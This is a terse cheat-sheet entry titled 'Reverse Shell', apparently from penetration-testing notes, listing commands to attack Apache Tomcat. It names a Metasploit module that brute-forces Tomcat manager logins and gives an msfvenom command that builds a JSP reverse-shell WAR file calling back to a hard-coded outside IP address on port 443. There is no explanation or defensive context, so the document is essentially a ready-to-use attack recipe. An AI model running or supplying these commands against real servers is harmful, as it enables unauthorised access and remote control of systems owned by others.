Reverse Shell

use auxiliary/scanner/http/tomcat_mgr_login

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.73.96.2 LPORT=443 -f war > shell.war
file shell.war

Last updated